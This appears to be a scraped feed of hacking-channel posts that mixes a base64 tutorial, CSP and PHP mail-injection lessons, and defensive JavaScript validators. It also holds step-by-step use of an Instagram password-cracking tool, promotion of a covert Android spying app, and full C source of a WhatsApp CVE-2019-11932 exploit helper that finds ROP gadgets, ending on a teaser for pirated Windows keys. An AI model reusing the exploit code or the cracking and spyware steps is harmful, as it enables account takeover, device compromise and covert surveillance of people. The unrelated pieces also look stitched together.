UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Base64 Encode and Decode From the Command Line:

How do you use the base64 command to encode and decode the data in a string or a file?

We performed the commands on an Ubuntu 20.04 Focal Fossa system, but you can run the same commands on other Linux distributions. To run them we used the command-line Terminal application, which can be opened with the Ctrl+Alt+T keyboard shortcut.

A) Base64 Syntax
Here is the syntax for encoding using Base64:

base64 [OPTION] [FILE]

Options
Some of the command-line options that can be used with the base64 command are:

-d or --decode
Use this option to decode a file or a string.

--help
Use this option to display help regarding the usage of base64.

-i, --ignore-garbage
Use this option while decoding to ignore non-alphabet characters.

--version
Use this option to display version information.


B) Encoding String
You can easily encode a string using the base64 command. For instance, to encode the sample text "Welcome to Linux" to base64, the command would be:

$ echo "Welcome to Linux" | base64

1) This command encodes the text in the string using base64 and prints the encoded text to standard output.

2) You can also save the encoded output to a file rather than printing it to standard output, using the redirection operator (>). The following command encodes the text and saves the output to a file named "encodedfile.txt":

$ echo "Welcome to Linux" | base64 > encodedfile.txt

3) To view the encoded file, you can use the cat command:

$ cat encodedfile.txt

C) Decoding String

1) You can also decode base64-encoded text using the --decode or -d option. For instance, to decode the base64-encoded text "V2VsY29tZSB0byBMaW51eAo=", the command would be:

$ echo "V2VsY29tZSB0byBMaW51eAo=" | base64 --decode

2) This command decodes the base64-encoded text and prints the original text to standard output.

3) You can also save the decoded output to a file rather than printing it to standard output, using the redirection operator (>). The following command decodes the encoded text and saves the original text to a file named "decodedfile.txt":

$ echo "V2VsY29tZSB0byBMaW51eAo=" | base64 --decode > decodedfile.txt

D) Encoding Text File
The base64 command can also be used to encode a text file. For instance, to encode a text file named "testfile.txt", the command would be:

$ base64 testfile.txt

unix forum
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hack instagram via linux :

🄻🄴🅃'🅂 🅂🅃🄰🅁🅃 :

1) git clone https://github.com/Ethical-H4CK3R/Instagram.git

This command will clone the entire program/script to your computer.

2) Now you need to chmod the directory and change into the program's directory.
Type:

> chmod -R 755 Instagram && cd Instagram

3) Now that we cloned the program/script, we now need to open the program.

> Type :

"ls"
to see what is inside the folder.

4) Now, as we know that there are three things inside the program/script folder, "Core", "README.md" and "instagram.py".

5) The executable program here is "instagram.py".
We need to execute the program. So type:

python instagram.py

6) To set up proxies: https://www.serverlab.ca/tutorials/linux/administration-linux/how-to-configure-proxy-on-ubuntu-18-04/

7) To set up a wordlist:
https://www.youtube.com/watch?v=GUNA0THt4a4

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 FREE ANDROID SPYING APPLICATION :

Remote access to the complete database of the targeted device with full invisibility on targeted devices.

Remote access the LIVE SCREEN SHARING OF TARGETED DEVICE

Remotely access to WEB HISTORY(in processing)

Remotely MONITORING MULTIPLE DEVICES AT A TIME WITH
BETTER CONSOLE

REALTIME WEB CONSOLE FOR MONITORING AND CONTROLLING

BETTER UX/UI DESIGN EXPERIENCE


» https://github.com/ranaaditya/SPYZIER-APP
(open source)

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Create your own antivirus-malware detection tools & tutorials :

* [File Scanning Framework](https://github.com/EmersonElectricCo/fsf) -
Modular, recursive file scanning solution.

* [Generic File Parser](https://github.com/uppusaikiran/generic-parser) - A single library parser to extract meta information, perform static analysis and detect macros within files.

* [hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with
a variety of algorithms.

* [HashCheck](https://github.com/gurnec/HashCheck) - Windows shell extension
to compute hashes with a variety of algorithms.

* [Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs.

* [Malfunction](https://github.com/Dynetics/Malfunction) - Catalog and
compare malware at a function level.

* [Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE
executables.

* [MASTIFF](https://github.com/KoreLogicSecurity/mastiff) - Static analysis
framework.

* [MultiScanner](https://github.com/mitre/multiscanner) - Modular file
scanning/analysis framework


git
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
WARNING! We have received many reports that some bad actors are using our profiles, names, pictures or logos to chat with people while impersonating us.

To chat with Undercode for support or help, DM the admins in the groups, or use our social media or email only:

Support@UndercodeTesting.com
Support@UndercodeNews.com

Thank you.
Programming books
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The real latest WhatsApp CVE:


Finally uploaded

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/

#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>

typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;

//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}

//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}

//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}

//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}



extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New tip:
The Content-Security-Policy

1. How can I allow multiple sources?
You can simply list your sources after a directive as a space-separated list:
content="default-src 'self' https://example.com/js/"
Note that there are no quotes around parameters other than the special ones, like 'self'. Also, there's no colon (:) after the directive. Just the directive, then a space-separated list of parameters.
Everything below the specified parameters is implicitly allowed. That means that in the example above these would be valid sources:
https://example.com/js/file.js
https://example.com/js/subdir/anotherfile.js
These, however, would not be valid:
http://example.com/js/file.js
^^^^ wrong protocol

https://example.com/file.js
                   ^^ above the specified path

2. How can I use different directives? What do they each do?
The most common directives are:
• default-src: the default policy for loading JavaScript, images, CSS, fonts, AJAX requests, etc.
• script-src: defines valid sources for JavaScript files
• style-src: defines valid sources for CSS files
• img-src: defines valid sources for images
• connect-src: defines valid targets for XMLHttpRequest (AJAX), WebSockets or EventSource. If a connection attempt is made to a host that's not allowed here, the browser will emulate a 400 error
There are others, but these are the ones you're most likely to need.

3. How can I use multiple directives?
You define all your directives inside one meta tag by terminating them with a semicolon (;):
content="default-src 'self' https://example.com/js/; style-src 'self'"

4. How can I handle ports?
Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
content="default-src 'self' https://ajax.googleapis.com http://example.com:123/free/stuff/"
The above would result in:
https://ajax.googleapis.com:123
                           ^^^^ Not ok, wrong port

https://ajax.googleapis.com - OK

http://example.com/free/stuff/file.js
                  ^^ Not ok, only the port 123 is allowed

http://example.com:123/free/stuff/file.js - OK
As I mentioned, you can also use an asterisk to explicitly allow all ports:
content="default-src example.com:*"

5. How can I handle different protocols?
By default, only standard protocols are allowed. For example, to allow WebSockets (ws://) you will have to allow it explicitly:
content="default-src 'self'; connect-src ws:; style-src 'self'"
                                         ^^^ WebSockets are now allowed on all domains and ports.

6. How can I allow the file protocol file://?
If you try to define it as such, it won't work. Instead, you allow it with the filesystem parameter:
content="default-src filesystem"

7. How can I use inline scripts and style definitions?
Unless explicitly allowed, you can't use inline style definitions, code inside <script> tags or in tag properties like onclick. You allow them like so:
content="script-src 'unsafe-inline'; style-src 'unsafe-inline'"
You'll also have to explicitly allow inline, base64-encoded images:
content="img-src data:"

8. How can I allow eval()?
I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
content="script-src 'unsafe-eval'"

9. What exactly does 'self' mean?
You might take 'self' to mean localhost, local filesystem, or anything on the same host. It doesn't mean any of those. It means sources that have the same scheme (protocol), same host, and same port as the file the content policy is defined in. Serving your site over HTTP? No https for you then, unless you define it explicitly.

Unixforum
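
The scheme, port and path rules from answers 1, 4, 5 and 9, as an added example that is not part of the original post: a simplified source-list matcher, run over the post's own URLs. The function names and the page address are assumptions, and scheme matching is strict, as the post describes it.

```javascript
// Added example: simplified CSP source-list matching (scheme, host, port, path).
// Not covered: host wildcards (*.example.com), nonces, hashes, 'unsafe-*' keywords.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// URL.port is '' when the URL uses its scheme's default port.
function effectivePort(u) {
  return u.port || DEFAULT_PORTS[u.protocol] || '';
}

// Does one source expression allow `target`? `pageUrl` is the page carrying the policy.
function sourceAllows(source, target, pageUrl) {
  const t = new URL(target);
  const page = new URL(pageUrl);
  if (source === "'self'") {
    // Same scheme, host and port as the page. Strict scheme equality follows the
    // post; the CSP Level 3 matching rules are more permissive about http-to-https.
    return t.protocol === page.protocol && t.hostname === page.hostname &&
      effectivePort(t) === effectivePort(page);
  }
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) {
    return t.protocol === source.toLowerCase();   // scheme-only source: ws:, data:
  }
  // host-source: [scheme://]host[:port|:*][/path]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/i.exec(source);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  const wantScheme = scheme ? scheme.toLowerCase() + ':' : page.protocol;
  if (t.protocol !== wantScheme || t.hostname !== host.toLowerCase()) return false;
  if (port !== '*' && effectivePort(t) !== (port || DEFAULT_PORTS[wantScheme] || '')) {
    return false;
  }
  if (!path || path === '/') return true;
  // A path ending in "/" is a prefix; any other path must match exactly.
  return path.endsWith('/') ? t.pathname.startsWith(path) : t.pathname === path;
}

// True if any source in a directive's space-separated list allows the URL.
function allowed(sources, target, pageUrl) {
  return sources.trim().split(/\s+/).some((s) => sourceAllows(s, target, pageUrl));
}

// The post's own URLs, evaluated for a page at a constructed address.
function evaluatePostExamples() {
  const page = 'https://site.example/index.html';
  const multi = "'self' https://example.com/js/";
  const ports = "'self' https://ajax.googleapis.com http://example.com:123/free/stuff/";
  return {
    below: allowed(multi, 'https://example.com/js/subdir/anotherfile.js', page),
    wrongScheme: allowed(multi, 'http://example.com/js/file.js', page),
    abovePath: allowed(multi, 'https://example.com/file.js', page),
    wrongPort: allowed(ports, 'https://ajax.googleapis.com:123/lib.js', page),
    defaultPortOnly: allowed(ports, 'http://example.com/free/stuff/file.js', page),
    explicitPort: allowed(ports, 'http://example.com:123/free/stuff/file.js', page),
    anyPort: allowed('example.com:*', 'https://example.com:8443/app.js', page),
    webSocket: allowed('ws:', 'ws://chat.example:9000/socket', page),
  };
}
```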
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 PHP mail injection practical exercise by Undercode:

1) Introduction

Internet use has risen sharply, but the vast majority of Internet users have no security background. Most people use the Internet to communicate with others via email. For this reason, most websites let users contact them to make suggestions, report a problem, or give feedback, and the feedback is sent to the website administrator's email address.

Unfortunately, most web developers don't know enough about code security. Some of them use existing libraries or frameworks that are subject to many known vulnerabilities. These vulnerabilities have been announced and the vendors have patched them, and the corresponding proof-of-concept attack code can be downloaded from the Internet, but most developers are too lazy to upgrade to the latest version.

Today we are going to talk about email injection, with which an attacker can use your mail server to send spam.

2) Email injection

Email injection is a security vulnerability that is widespread in Internet applications that send and receive email. It is similar to HTTP header injection. Like SQL injection, it belongs to a common class of vulnerability that occurs when one programming language is embedded in another, such as MySQL embedded in PHP.

When a form that submits data to a web application is added to a web page, a malicious user may use the MIME format to add extra information to the message being sent (POST/GET), such as a new recipient list or a completely different message body. Because the MIME format uses carriage returns to separate the pieces of information in a message (in an HTTP packet there is a newline between each line, and two newlines between the HTTP headers and the POST body), adding a carriage return to the submitted form data (easily done with some plug-ins of FB) allows a simple message board to be used to send thousands of messages. In the same way, a spammer can use this tactic to send large numbers of anonymous messages.

Email injection is an attack against PHP's built-in mail function. It allows a malicious attacker to inject any email header field, such as BCC, CC or Subject, and so to send spam from the victim's mail server. For this reason, this type of attack is called email injection, or mail-form spam. The vulnerability is not limited to PHP; it may affect any application that accepts input from a user interface and sends email messages. The main cause of this kind of attack is improper validation of user input, or an application that has no authentication and filtering mechanism at all.

3) The attack principle of email injection

The old Chinese saying puts it well: only by knowing it can you know why.

To explain how email injection works, we first need to understand how the PHP mail function works. Below is the API description from the PHP Manual:

mail():
http://www.php.net/manual/en/function.mail.php
bool mail (string $to, string $subject, string $message [, string $additional_headers [, string $additional_parameters ]])

Note that the function takes three required parameters (destination, subject and message) and some optional parameters, and that it returns a Boolean value.

https://pastebin.com/gfrEEmGa
Now see this code:



First part:

<?php
$to="littlehann@foxmail.com";
if (!isset($_POST["send"])){
?>

This code checks whether the form has been submitted. The script responds differently when the user clicks the submit button than when the page is visited normally. If the condition is true, the form has not been submitted, so the form is displayed and waits for user input. If it is false, the form has been submitted, so the email is sent.

Second part:

<form method="POST" action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>">
From: <input type="text" name="sender">
Subject: <input type="text" name="subject">
Message:
<textarea name="message" rows="10" cols="60" lines="20"></textarea>
<input type="submit" name="send" value="Send">
</form>

The second part is an HTML form, which takes the user's input.

MORE: https://pastebin.com/f8YAfm2P

🦑 4) Mail injection demonstration

Note:

To use PHP as a mailing agent, we need to configure php.ini:

[mail function]
; For Win32 only.
; http://php.net/smtp
SMTP = smtp.qq.com
; http://php.net/smtp-port
smtp_port = 25

For demonstration purposes, we will use the vulnerable code from above. In addition, we will submit the following values as the parameters for sending the email:

mail("littlehann@foxmail.com", "Call me urgent", "Hi,\nPlease call me ASAP.\nBye", "From: Test@UndercodeTesting.com")

HTTP packet sent ...

🦑 From the attacker's point of view, there are many additional fields that can be injected into the email header. See RFC 822 for more information. For example, CC (carbon copy) or BCC (blind carbon copy) allows the attacker to insert more messages.

Note, however, that before a new parameter is added, a newline must be added to separate each field. The hexadecimal value of the newline character is "0x0A".
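
The check a form handler needs before a field reaches the additional-headers argument, as an added example that is not code from the post: it models the header string in JavaScript rather than PHP, beside a hardened builder that rejects line breaks. The function names and sample addresses are constructed; the field names follow the post's form.

```javascript
// Added example, not code from the post. Field names follow the post's form
// (sender, subject, message); the sample values are constructed.

// The pattern the post calls vulnerable: a form value concatenated into the
// additional-headers string as-is.
function buildHeadersUnsafe(sender) {
  return 'From: ' + sender;
}

// Header names a mail transport would see in a raw header block.
function headerNames(raw) {
  return raw.split(/\r\n|\r|\n/)
    .filter((line) => line.includes(':'))
    .map((line) => line.slice(0, line.indexOf(':')).trim().toLowerCase());
}

// Single-line fields (sender, subject) must never contain CR or LF, raw or
// still percent-encoded. Returns a finding for logging, or null if clean.
function inspectField(name, value) {
  let decoded = value;
  try { decoded = decodeURIComponent(value); } catch (e) { /* keep raw value */ }
  if (!/[\r\n]/.test(decoded)) return null;
  const extraLines = decoded.split(/\r\n|\r|\n/).slice(1).join('\n');
  return { field: name, smuggledHeaders: headerNames(extraLines) };
}

// Hardened builder: reject line breaks, then require one plain address.
function buildHeadersSafe(sender) {
  if (inspectField('sender', sender)) {
    throw new Error('line break in sender field');
  }
  if (!/^[^\s@<>,;:]+@[^\s@<>,;:]+$/.test(sender)) {
    throw new Error('sender is not a single address');
  }
  return 'From: ' + sender;
}

// Constructed inputs: one ordinary value, one carrying an extra header line.
const ordinary = 'visitor@example.org';
const tampered = 'visitor@example.org\nBcc: someone-else@example.net';

function demo() {
  let rejected = false;
  try { buildHeadersSafe(tampered); } catch (e) { rejected = true; }
  return {
    unsafeSees: headerNames(buildHeadersUnsafe(tampered)),
    finding: inspectField('sender', tampered),
    rejected,
    safe: buildHeadersSafe(ordinary),
  };
}
```

The same validation applies to the subject field, which is also written into the header block; only the message body may contain line breaks.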

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
List of Windows 8.1 Product/Serial Keys 2019